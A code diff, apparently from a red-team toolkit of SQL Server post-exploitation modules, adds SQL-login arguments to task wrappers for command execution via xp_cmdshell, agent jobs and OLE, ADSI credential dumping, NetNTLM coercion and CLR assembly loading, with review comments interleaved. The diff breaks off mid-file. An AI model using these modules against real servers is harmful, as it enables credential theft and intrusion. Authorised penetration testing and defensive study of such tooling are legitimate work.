diff --git a/SQL/SQL_bof.s1.py b/SQL/SQL_bof.s1.py
new file mode 100644
index 0000000..bfb56dc
--- /dev/null
+++ b/SQL/SQL_bof.s1.py
@@ -0,0 +1,597 @@ +from hashlib import sha512 +from typing import Dict, List, Optional, Tuple + +from outflank_stage1.task.base_bof_task import BaseBOFTask +from outflank_stage1.task.enums import BOFArgumentEncoding +from outflank_stage1.task.exceptions import TaskInvalidArgumentsException + +class SQLBOFTask(): + + def __init__(self, name: str, base_binary_name: str = None): + super().__init__(name, base_binary_name=base_binary_name) + + self.parser.add_argument( + "server", + ) + + self.add_auth_args() + + def add_auth_args(self): + + self.parser.add_argument( + "-u", "--user", + help="user for SQL authentication; if omitted, Windows authentication is used", + default="", + nargs="?" + ) + + self.parser.add_argument( + "-p", "--password", + help="password for SQL authentication", + default="", + nargs="?" + ) + + def add_common_args(self): + + self.parser.add_argument( + "database", + default="", + nargs="?" + ) + + self.parser.add_argument( + "linkedserver", + default="", + nargs="?" + ) + + self.parser.add_argument( + "impersonate", + default="", + nargs="?" 
+ ) + + def encode_auth_args(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return [ + (BOFArgumentEncoding.STR, parser_arguments.server), + (BOFArgumentEncoding.STR, parser_arguments.user), + (BOFArgumentEncoding.STR, parser_arguments.password), + ] + + def encode_common_args(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + (BOFArgumentEncoding.STR, parser_arguments.linkedserver), + (BOFArgumentEncoding.STR, parser_arguments.impersonate), + ] + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + return self.encode_common_args(arguments) + + def split_arguments(self, arguments: Optional[str], strip_quotes: bool = True) -> List[str]: + # warning: this does only strip double quotes, single quotes are passed on + return super().split_arguments(arguments, strip_quotes) + +class SQL1434udpBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-1434udp", "./1434udp/1434udp") + + self.parser.description = "Enumerate SQL Server connection info" + + self.parser.epilog = "Must provide an IP; hostnames are not accepted" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return [ + (BOFArgumentEncoding.STR, parser_arguments.server), + ] + +class SQLAdsiBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-adsi", "./adsi/adsi") + + self.parser.add_argument( + "adsiserver", + ) + + self.parser.add_argument( + "port", + default=4444, + nargs="?" + ) + + self.add_common_args() + + self.parser.description = "Obtain ADSI creds from ADSI linked server" + + self.parser.epilog = "Port defaults to 4444. 
This gets opened on the SQL Server with the ADSI link, not the beaconing host" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.adsiserver), + (BOFArgumentEncoding.STR, parser_arguments.port), + ] + +class SQLAgentCmdBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-agentcmd", "./agentcmd/agentcmd") + + self.parser.add_argument( + "command", + ) + + self.add_common_args() + + self.parser.description = "Execute a system command using agent jobs" + + self.parser.epilog = "Output is not returned" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.command), + ] + +class SQLAgentStatusBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-agentstatus", "./agentstatus/agentstatus") + + self.add_common_args() + + self.parser.description = "Enumerate SQL agent status and jobs" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + return self.encode_common_args(arguments) + +class SQLCheckRpcBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-checkrpc", "./checkrpc/checkrpc") + + self.add_common_args() + + self.parser.description = "Enumerate RPC status of linked servers" + +class SQLClrBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-clr", "./clr/clr") + + # not needed, will always be asked to upload assembly through GUI + # + # self.parser.add_argument( + # "dllpath", + # ) + + self.parser.add_argument( + "function", + help="name of the stored procedure to create" + ) + + self.add_common_args() + + self.parser.description = 
"Load and execute .NET assembly in a stored procedure" + + def validate_files(self, arguments: List[str]): + + assembly = self.get_file_by_name("assembly") + + if assembly is None: + raise TaskInvalidArgumentsException("No .NET assembly uploaded") + + if not assembly.original_name.endswith(".dll"): + raise TaskInvalidArgumentsException("Uploaded file is not a DLL") + + def get_gui_elements(self) -> Optional[Dict]: + return { + "title": "Upload .NET assembly", + "desc": "Load and execute .NET assembly in a stored procedure", + "elements": [ + { + "name": "assembly", + "type": "file", + "description": ".NET assembly", + "placeholder": "Select .NET assembly", + }, + ], + } + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + + assembly = self.get_file_by_name("assembly") + + self.append_response(f'[*] Running sql-clr BOF with .NET assembly: "{assembly.original_name}"\n\n') + + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.function), + (BOFArgumentEncoding.STR, sha512(assembly.content).hexdigest()), + (BOFArgumentEncoding.BUFFER, assembly.content), + ] + +class SQLColumnsBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-columns", "./columns/columns") + + self.parser.add_argument( + "table", + ) + + self.add_common_args() + + self.parser.description = "Enumerate columns within a table" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + # cannot use encode_common_args helper function, because table is passed in middle of other arguments + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + (BOFArgumentEncoding.STR, parser_arguments.table), + (BOFArgumentEncoding.STR, parser_arguments.linkedserver), + (BOFArgumentEncoding.STR, 
parser_arguments.impersonate), + ] + +class SQLDatabasesBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-databases", "./databases/databases") + + self.add_common_args() + + self.parser.description = "Enumerate databases on a server" + +class SQLDisableClrBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disableclr", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable CLR integration" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "clr enabled"), + (BOFArgumentEncoding.STR, "0"), + ] + +class SQLEnableClrBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enableclr", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable CLR integration" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "clr enabled"), + (BOFArgumentEncoding.STR, "1"), + ] + +class SQLDisableOleBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disableole", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable OLE Automation Procedures" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "Ole Automation Procedures"), + (BOFArgumentEncoding.STR, "0"), + ] + +class SQLEnableOleBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enableole", "./togglemodule/togglemodule") + + self.add_common_args() + + 
self.parser.description = "Enable OLE Automation Procedures" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "Ole Automation Procedures"), + (BOFArgumentEncoding.STR, "1"), + ] + +class SQLDisableRpcBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disablerpc", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable RPC and RPC out on a linked server" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "rpc"), + (BOFArgumentEncoding.STR, "FALSE"), + ] + +class SQLEnableRpcBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-enablerpc", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable RPC and RPC out on a linked server" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "rpc"), + (BOFArgumentEncoding.STR, "TRUE"), + ] + +class SQLDisableXpBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-disablexp", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Disable xp_cmdshell" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "xp_cmdshell"), + (BOFArgumentEncoding.STR, "0"), + ] + +class SQLEnableXpBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + 
super().__init__("sql-enablexp", "./togglemodule/togglemodule") + + self.add_common_args() + + self.parser.description = "Enable xp_cmdshell" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, "xp_cmdshell"), + (BOFArgumentEncoding.STR, "1"), + ] + +class SQLImperonsate(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-impersonate", "./impersonate/impersonate") + + self.parser.add_argument( + "database", + default="", + nargs="?" + ) + + self.parser.description = "Enumerate users that can be impersonated" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + ] + +class SQLInfoBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-info", "./info/info") + + self.parser.add_argument( + "database", + default="", + nargs="?" 
+ ) + + self.parser.description = "Gather information about the SQL server" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + ] + +class SQLLinksBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-links", "./links/links") + + self.add_common_args() + + self.parser.description = "Enumerate linked servers" + +class SQLOleCmdBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-olecmd", "./olecmd/olecmd") + + self.parser.add_argument( + "command", + ) + + self.add_common_args() + + self.parser.description = "Execute a system command using OLE automation procedures" + + self.parser.epilog = "Output is not returned" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.command), + ] + +class SQLQueryBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-query", "./query/query") + + self.parser.add_argument( + "query", + ) + + self.add_common_args() + + self.parser.description = "Execute a custom SQL query" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.query), + ] + +class SQLRowsBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-rows", "./rows/rows") + + self.parser.add_argument( + "table", + ) + + self.add_common_args() + + self.parser.description = "Get the count of rows in a table" + + def _encode_arguments_bof(self, arguments: List[str]) -> 
List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + # cannot use encode_common_args helper function, because table is passed in middle of other arguments + return self.encode_auth_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.database), + (BOFArgumentEncoding.STR, parser_arguments.table), + (BOFArgumentEncoding.STR, parser_arguments.linkedserver), + (BOFArgumentEncoding.STR, parser_arguments.impersonate), + ] + +class SQLSearchBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-search", "./search/search") + + self.parser.add_argument( + "keyword", + ) + + self.add_common_args() + + self.parser.description = "Search a table for a column name" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.keyword), + ] + +class SQLSmbBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-smb", "./smb/smb") + + self.parser.add_argument( + "listener", + ) + + self.add_common_args() + + self.parser.description = "Coerce NetNTLM auth via xp_dirtree" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.listener), + ] + +class SQLTablesBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-tables", "./tables/tables") + + self.add_common_args() + + self.parser.description = "Enumerate tables within a database" + +class SQLUsersBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-users", "./users/users") + + self.add_common_args() + + self.parser.description = "Enumerate users with database access" + +class SQLWhoamiBOF(SQLBOFTask, 
BaseBOFTask): + + def __init__(self): + super().__init__("sql-whoami", "./whoami/whoami") + + self.add_common_args() + + self.parser.description = "Gather information about the SQL server" + +class SQLXpCmdBOF(SQLBOFTask, BaseBOFTask): + + def __init__(self): + super().__init__("sql-xpcmd", "./xpcmd/xpcmd") + + self.parser.add_argument( + "command", + ) + + self.add_common_args() + + self.parser.description = "Execute a system command using xp_cmdshell" + + self.parser.epilog = "Output returned unless using a linked server. WARNING: running a persistent command will cause the beacon to hang" + + def _encode_arguments_bof(self, arguments: List[str]) -> List[Tuple[BOFArgumentEncoding, str]]: + parser_arguments = self.parser.parse_args(arguments) + + return self.encode_common_args(arguments) + [ + (BOFArgumentEncoding.STR, parser_arguments.command), + ] diff --git a/src/SQL/adsi/entry.c b/src/SQL/adsi/entry.c index 7cb9fe2..f0262f1 100644 --- a/src/SQL/adsi/entry.c +++ b/src/SQL/adsi/entry.c @@ -36,7 +36,7 @@ void* RunThreadedQuery(LPVOID threadData) { intFree(query); } -void DumpAdsiCreds(char* server, char* database, char* link, char* impersonate, char* adsiServer, char* port) +void DumpAdsiCreds(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* adsiServer, char* port) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -58,11 +58,11 @@ void DumpAdsiCreds(char* server, char* database, char* link, char* impersonate, if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { 
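Review bot: `SQLAdsiBOF` declares `port` with `default=4444` (an int) but encodes it as `BOFArgumentEncoding.STR`, so the defaulted value reaches the encoder as a non-string while an explicitly supplied one arrives as `str`; the BOF side extracts it as a string (`port = BeaconDataExtract(...)` as `char*`), so this should be `default="4444"`. The `-u/--user` and `-p/--password` options use `nargs="?"` with no `const`, so `-u` given without a value yields `None` instead of `""` and `encode_auth_args` then emits `(STR, None)` rather than falling back to Windows auth; drop `nargs="?"` on both options or add `const=""`. `validate_files` in `SQLClrBOF` rejects `Foo.DLL` because the check is case-sensitive: `if not assembly.original_name.lower().endswith(".dll"):`. Minor: `SQLWhoamiBOF` reuses sql-info's description "Gather information about the SQL server" verbatim, which makes the two commands indistinguishable in help output, and the class name `SQLImperonsate` is misspelled.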
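Review bot: Both `ConnectToSqlServer` calls now forward `password` verbatim, and `ConnectToSqlServer` itself is not part of this diff; if it assembles an ODBC connection string, a password containing `;` or `}` will terminate the `PWD=` token unless it is wrapped as `PWD={...}` with any `}` doubled, so confirm the helper braces it or reject such values before the call. A short comment at the call site would make the contract visible, e.g. `// user/password NULL -> trusted (Windows) auth; ConnectToSqlServer is responsible for quoting`. `DumpAdsiCreds` continues outside the hunk.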
@@ -245,11 +245,11 @@ void DumpAdsiCreds(char* server, char* database, char* link, char* impersonate, internal_printf("[*] Creating a second connection to the SQL server for threaded query\n"); if (link == NULL) { - dbc2 = ConnectToSqlServer(&env2, server, database); + dbc2 = ConnectToSqlServer(&env2, server, user, password, database); } else { - dbc2 = ConnectToSqlServer(&env2, server, NULL); + dbc2 = ConnectToSqlServer(&env2, server, user, password, NULL); } if (dbc2 == NULL) { @@ -371,6 +371,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -383,6 +385,8 @@ VOID go( datap parser; BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); @@ -390,6 +394,8 @@ VOID go( port = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -404,7 +410,7 @@ VOID go( return; } - DumpAdsiCreds(server, database, link, impersonate, adsiServer, port); + DumpAdsiCreds(server, user, password, database, link, impersonate, adsiServer, port); printoutput(TRUE); }; 
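Review bot: `user = *user == 0 ? NULL : user;` and the matching `password` line dereference the pointers returned by `BeaconDataExtract` without a NULL check; per the Beacon data API that call returns NULL when the packed buffer is exhausted, and because this commit inserts two new fields in the middle of the layout, a task script built against the old five-string layout (or any truncated task) will now read through a null pointer before the existing argument checks run. The pre-existing `server`/`database` lines have the same weakness, but the layout change is what makes a mismatch likely in practice. Suggest a guard directly after the extraction block: `if (!server || !user || !password || !database || !link || !impersonate || !adsiServer || !port) { internal_printf("[!] Malformed task arguments\n"); return; }`. The body of `go` continues outside the hunk.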
@@ -413,13 +419,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "ADSIr", "4444"); + DumpAdsiCreds("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "ADSIr", "4444"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "ADSIr", "4444"); + DumpAdsiCreds("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "ADSIr", "4444"); internal_printf("\n\n============ LINK TEST ============\n\n"); - DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "ADSIEssos", "4444"); + DumpAdsiCreds("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "ADSIEssos", "4444"); } #endif diff --git a/src/SQL/agentcmd/entry.c b/src/SQL/agentcmd/entry.c index 3f5c4b6..af92030 100644 --- a/src/SQL/agentcmd/entry.c +++ b/src/SQL/agentcmd/entry.c @@ -5,7 +5,7 @@ #include "sql_agent.c" -void ExecuteAgentCommand(char* server, char* database, char* link, char* impersonate, char* command) +void ExecuteAgentCommand(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* command) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -17,11 +17,11 @@ void ExecuteAgentCommand(char* server, char* database, char* link, char* imperso if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -168,6 +168,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
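Review bot: None of the updated `main()` test calls exercise the new SQL-authentication path: every call passes `NULL, NULL` for user and password, so the only code this commit adds is never run by the harness. Add at least one case with a lab SQL login, e.g. `DumpAdsiCreds("castelblack.north.sevenkingdoms.local", "sa", getenv("LAB_SQL_PASSWORD"), "master", NULL, NULL, "ADSIr", "4444");`, reading the credential from the environment so it does not land in the repository. The same applies to the `main()` harnesses in the agentcmd, agentstatus, checkrpc and clr files below.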
@@ -180,12 +182,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); command = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -200,7 +206,7 @@ VOID go( return; } - ExecuteAgentCommand(server, database, link, impersonate, command); + ExecuteAgentCommand(server, user, password, database, link, impersonate, command); printoutput(TRUE); }; @@ -213,13 +219,13 @@ int main() // GOAD uses SQLExpress so turning to makeshift lab here // internal_printf("============ BASE TEST ============\n\n"); - ExecuteAgentCommand("192.168.0.215", "master", NULL, NULL, "notepad.exe"); + ExecuteAgentCommand("192.168.0.215", NULL, NULL, "master", NULL, NULL, "notepad.exe"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteAgentCommand("192.168.0.215", "master", NULL, "sa", "notepad.exe"); + ExecuteAgentCommand("192.168.0.215", NULL, NULL, "master", NULL, "sa", "notepad.exe"); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteAgentCommand("192.168.0.215", "master", "TRETOGOR", NULL, "notepad.exe"); + ExecuteAgentCommand("192.168.0.215", NULL, NULL, "master", "TRETOGOR", NULL, "notepad.exe"); } #endif diff --git a/src/SQL/agentstatus/entry.c b/src/SQL/agentstatus/entry.c index bf54b5d..720a563 100644 --- a/src/SQL/agentstatus/entry.c +++ b/src/SQL/agentstatus/entry.c 
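Review bot: A login given without a password arrives here as `user != NULL, password == NULL` (the task script sends `""` when `-p` is omitted, which the new line maps to NULL), and that mixed state is passed straight to `ExecuteAgentCommand`; nothing on this side decides whether it means a blank SQL password or a fall-back to Windows auth, and `ConnectToSqlServer` is not in the diff, so the outcome is whatever its connection-string code happens to do. Make the contract explicit, e.g. `if (user && !password) { internal_printf("[!] SQL auth requires a password (-p)\n"); return; }`, or add a comment stating that an empty password is intentionally passed through. `go` continues outside the hunk.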
@@ -5,7 +5,7 @@ #include "sql_agent.c" -void CheckAgentStatus(char* server, char* database, char* link, char* impersonate) +void CheckAgentStatus(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -15,11 +15,11 @@ void CheckAgentStatus(char* server, char* database, char* link, char* impersonat if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -82,6 +82,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -93,11 +95,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -112,7 +118,7 @@ VOID go( return; } - CheckAgentStatus(server, database, link, impersonate); + CheckAgentStatus(server, user, password, database, link, impersonate); printoutput(TRUE); }; 
@@ -125,13 +131,13 @@ int main() // GOAD uses SQLExpress so turning to makeshift lab here // internal_printf("============ BASE TEST ============\n\n"); - CheckAgentStatus("192.168.0.215", "master", NULL, NULL); + CheckAgentStatus("192.168.0.215", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckAgentStatus("192.168.0.215", "master", NULL, "sa"); + CheckAgentStatus("192.168.0.215", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckAgentStatus("192.168.0.215", "master", "TRETOGOR", NULL); + CheckAgentStatus("192.168.0.215", NULL, NULL, "master", "TRETOGOR", NULL); } #endif diff --git a/src/SQL/checkrpc/entry.c b/src/SQL/checkrpc/entry.c index f62bccc..c858ea8 100644 --- a/src/SQL/checkrpc/entry.c +++ b/src/SQL/checkrpc/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckRpc(char* server, char* database, char* link, char* impersonate) +void CheckRpc(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckRpc(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -65,6 +65,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -76,12 +78,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; database = *database == 0 ? "master" : database; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -95,7 +101,7 @@ VOID go( return; } - CheckRpc(server, database, link, impersonate); + CheckRpc(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -105,13 +111,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckRpc("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckRpc("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckRpc("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/clr/entry.c b/src/SQL/clr/entry.c index bb2b5c6..88ef7b2 100644 --- a/src/SQL/clr/entry.c +++ b/src/SQL/clr/entry.c 
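Review bot: The `user`/`password` defaulting lines are placed after the `database` default here (and again in the clr file), whereas adsi, agentcmd and agentstatus put them directly after `server`, matching the extraction order; keeping one order across the BOFs lets a reader recover the wire layout from the defaulting block alone. Suggest moving the two lines so the block reads `server = ...; user = ...; password = ...; database = ...;`. `go` continues outside the hunk.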
@@ -5,7 +5,7 @@ #include "sql_clr.c" -void ExecuteClrAssembly(char* server, char* database, char* link, char* impersonate, char* function, char* hash, char* hexBytes) +void ExecuteClrAssembly(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* function, char* hash, char* hexBytes) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -18,11 +18,11 @@ void ExecuteClrAssembly(char* server, char* database, char* link, char* imperson if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -219,6 +219,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -234,6 +236,8 @@ VOID go( datap parser; BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = 